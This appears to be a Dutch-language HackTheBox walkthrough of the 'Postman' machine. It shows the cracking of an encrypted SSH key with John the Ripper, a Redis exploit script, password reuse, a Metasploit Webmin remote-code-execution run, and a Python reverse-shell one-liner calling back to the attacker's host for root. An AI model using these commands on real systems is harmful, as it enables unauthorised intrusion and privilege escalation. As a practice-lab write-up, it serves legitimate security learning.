"LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRFSy1JbmZvOiBERVMtRURFMy1DQkMsNzNFOUNFRkJDQ0Y1Mjg3QwoKSmVoQTUxSTE3cnNDT09WcXlXeCtDODM2M0lPQllYUTExRGR3L3ByM0wyQTJORHRCN3R2c1hOeXFLRGdoZlFuWApjd0dKSlVEOWtLSm5pSmtKenJ2RjFXZXB2TU5rajlaSXRYUXpZTjh3Ympscmt1MWJKcTV4bkpYOUVVYjVJN2syCjdHc1R3c012S3pYa2tmRVpRYVhLL1Q1MHMzSTRDZGNmYnIxZFhJeWFiWExMcFpPaVpFS3ZyNCtLeVNqcDRvdTYKY2RuQ1doemtBL1R3SnBYRzFXZU9tTXZ0Q1pXMUhDQnV0WXNOUDZCRGY3OGJRR21tbGlycVJtWGZMQjkySmhUOQoxdThKekhDSjF6Wk1HNXZhVXR2b24wcWdQeDd4ZUlVTzZMQUZUb3pyTjlNR1dFcUJFSjV6TVZycnQzVEdWa2N2CkV5dmxXd2tzN1IvZ2p4SHlVd1QrYTVMQ0dHU2pWRDg1THhZdXRnV3hPVUtidFdHQmJVOHlpN1lzWGxLQ3d3SFAKVUg3T2ZRejAzVld5K0swYWE4UXMrRXl3Nlgzd2JXbnVlMDNuZy9zTEpuSjcyOXpiM2t1eW04citoVSs5djZWWQpTaitRbmpWVFlqRGZuVDIyakpCVUhUVjJ5cktlQXo2Q1hkRlQreEloeEVBaXYwbTFaa2t5UWtXcFVpQ3p5dVlLCnQrTVN0d1d0U3QwVko0VTFOYTJHM3hHUGptcmttandYdnVkS0MwWU4vT0JvUFBPVGFCVkQ5aTZmc29aNnB3blMKNU1pOEJ6ckJoZE8wd0hhRGNUWVBjM0IwMEN3cUFWNU1YbWtBazJ6S0wwVzJ0ZFZZa3NLd3hLQ3dHbVdscGRrZQpQMkpHbHA5TFdFZXJNZm9sYmpUU09VNW1EZVBmTVEzZndDTzZNUEJpcXpyckZjUE5KcjcvTWNRRUNiNXNmK082CmpLRTNKZm4wVVZFMlFWZFZLM29FTDZEeWFCZi9XMmQvM1Q3cTEwVWQ3Sys0S2QzNmd4TUJmMzNFYTYrcXgzR2UKU2JKSWhrc3c1VEtoZDUwNUFpVUgyVG44OXFOR2VjVkpFYmpLZUovdkZaQzVZSXNRKzlzbDg5VG1KSEw3NFkzaQpsM1lYREVzUWpoWkh4WDVYL1JVMDJEK0FGMDdwM0JTUmpoRDMwY2pqMHV1V2tLb3dwb28wWTBlYmxnbWQ3bzJYCjBWSVdyc2tQSzRJN0lINWdia3J4VkdiLzlnL1cydWExQzNObmN2M01OY2YwbmxJMTE3QlMvUXdOdHVUb3pHOHAKUzlrM2xpK3JZcjZmM21hL1VMc1VuS2labHM4U3BVK1JzYW9zTEdLWjZwMm9JZThvUlNtbE9Dc1kwSUNxN2VSUgpoa3V6VXVIOXovbUJvMnRRV2g4cXZUb0NTRWpnOHlOTzl6OCtMZG9OMXdRV01QYVZ3UkJqSXl4Q1BIRlRKM3UrClp4eTB0SVB3akNadnhVZlluL0s0RlZIYXZ2QStiOWxvcG5VQ0VBRVJwd0l2OCt0WW9md0dWcExWQzBEck41OFYKWFRmQjJYOXNMMW9CM2hPNG1KRjBaM3lKMktaRWRZd0hHdXFOVEZhZ04wZ0JjeU5JMndzeFpOeklLMjZ2UHJPRApiNkJjOVVkaVdDWnFNS1V4NGFNVExoRzVST2pnUUd5dFdmL3E3TUdyTzNjRjI1azFQRVdOeVpNcVk0V1lzWlhpCldoUUZIa0ZPSU53VkVPdEhha1ovVG9ZYVVRTnRSVDZwWnlIZ3ZqVDBtVG8wdDNqVUVSc3BwajFwd2JnZ0NHbWgKS1RrbWhLK01UYW95ODlDZzBYdzJKMThEbTBvNzhwNlVOcmtTdWUxQ3NXakVmRUlGM05BTUVVMm8rTmdxOTJIbQpucEFGUmV0dndRN3h1a2swcmJiNm12RjhnU3FMUWc3V3BiWkZ5dGdTMDVUcFBaUE0waDh0UkU4WVJkSmhlV3JRClZjTnlaSDhPSFlxRVM0ZzJVRjYyS3B0dHFTd0xpaUY0dXRIcSsvaDVDUXdzRitKUmc4OGJueGgyejJCRDZpNVcKWCtoSzVIUHBwNlFualo4QTVFUnVVRUdhWkJFVXZHSnRQR0hqWnlMcGt5dE1oVGphT3JSTll3PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K" | base64 -d > Matts.KEy 

Ik heb de ssh-sleutel met behulp van ssh2john gekraakt om een hash van de privésleutel te nemen om deze voor wachtwoordzin te bruteforce.

transferring to a file
root@kali:~/Desktop/HackTheBox-Machines/Postman# /opt/JohnTheRipper/run/ssh2john.py Matts.KEy
Matts.KEy:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb2867aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b50b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a024848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e414e20dc1510eb476a467f4e861a51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af761e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63

root@kali:~/Desktop/HackTheBox-Machines/Postman# /opt/JohnTheRipper/run/ssh2john.py Matts.KEy > mattsHash

Heb nu de hash in een bestand met de naam mattHash als je de laatste regel ziet. Nu zullen we John gebruiken om het bruut te forceren.

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt mattsHash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (Matts.KEy)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2022-06-03 09:25) 0.1883g/s 2700Kp/s 2700Kc/s 2700KC/sa6_123..*7¡Vamos!
Session completed
┌─[puck@parrot-lt]─[~/htb/postman]

Ik heb de wachtwoordzin als computer2008. dus ik probeerde binnen te komen, maar het kon niet uitkomen, we kunnen niet ssh als mat zijn geweigerd. dus ik dacht dat het misschien een scenario is voor het hergebruik van wachtwoorden. Ik heb me aangemeld als Redis met exploit.sh. gebruikte su – Matt met computer2008 en we kregen de gebruiker Matt

root@kali:~/Desktop/HackTheBox-Machines/Postman# ./exploit.sh 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:XTO4XdFGWOrxgauNIXyIDNUYptM90shUZ2j+ok1C90M root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       ==..o  .=o|
|      B.++o.  ooo|
|     + =o+. +.+o |
|      +.++oE =.o.|
|      .oS+*o... .|
|       . oo+=    |
|        = .o..   |
|       . .       |
|                 |
+----[SHA256]-----+
OK
OK
OK
OK
OK
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1

redis@Postman:~$ 
redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ whoami
Matt

Rooting Postman.

Ik probeerde linEnum.sh opnieuw als mat en mijn shell brak. Dus ik gebruikte diezelfde inloggegevens op het portaal van de website. Wanneer we proberen in te loggen, wordt er gezegd dat we verbinding moeten maken via ssh en dat we een vermelding Postman in ons hostbestand moeten hebben. Laten we dat heel snel doen.

Postman Webmin
Postman Webmin

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $echo "10.10.10.160 Postman" | sudo tee -a /etc/hosts; cat /etc/hosts
[sudo] password for puck: 
10.10.10.160 Postman
127.0.0.1 localhost

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.178.209 unika.htb
10.10.10.160 Postman
┌─[puck@parrot-lt]─[~/htb/postman]

.

Nu hebben we toegang tot de website portal via ssh.

Postman Webmin hackthebox
Postman Webmin hacktheboxHier zagen we een versienummer in het Webmin-paneel. Ik googelde een exploit voor hetzelfde. waar ik een Metasploit-module voor het exacte versienummer vond, was het een geverifieerde uitvoering van externe code. dus ik gebruikte Metasploit. dit was de exploit.
msf5 > use linux/http/webmin_packageup_rce+
msf5 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.165     yes       The listen address (an interface may be specified)
   LPORT  9004             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910

Hier zijn de opties die ik heb gebruikt voor Metasploit, vergeet niet om SSL te gebruiken, ingesteld op true, omdat Webmin op SSL draait.

msf6 exploit(linux/http/webmin_packageup_rce) > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD computer2008 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.160 yes The target host(s), see https://github.com/rapid7/metasploit
-framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME Matt yes Webmin Username
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 9002 yes The listen port


Exploit target:

Id Name
-- ----
0 Webmin <= 1.910


msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.2:9002 
[+] Session cookie: 9fc4d08d07df5caf01f4fa90cc769085
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:9002 -> 10.10.10.160:59780 ) at 2022-06-03 09:54:36 +0200

whoami

root

.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",9004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

.

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $nc -nlvp 9004
listening on [any] 9004 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.160] 47606
# id
id
uid=0(root) gid=0(root) groups=0(root)
#
root@Postman:~# hostnamectl
hostnamectl
Static hostname: Postman
Icon name: computer-vm
Chassis: vm
Machine ID: 2cb57e052840450f9a54b149b131d24d
Boot ID: b59c72de907647508f55aa1f2bbba91d
Virtualization: vmware
Operating System: Ubuntu 18.04.3 LTS
Kernel: Linux 4.15.0-58-generic
Architecture: x86-64
root@Postman:~# 


root@Postman:~# crontab -l
crontab -l
# Edit this file to introduce tasks to be run by cron.
..snip...
# m h dom mon dow command
@reboot ifconfig 192.168.0.80 netmask 255.255.255.0 up
@reboot iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6379
root@Postman:~#
root@Postman:~# systemctl status redis
systemctl status redis
* redis-server.service - Advanced key-value store
Loaded: loaded (/lib/systemd/system/redis-server.service; enabled; vendor preset: enabled)
Active: active (running) since Thu 2022-06-02 11:26:48 BST; 22h ago
Docs: http://redis.io/documentation,
man:redis-server(1)
Process: 603 ExecStart=/usr/bin/redis-server /etc/redis/redis.conf (code=exited, status=0/SUCCESS)


Dat is het.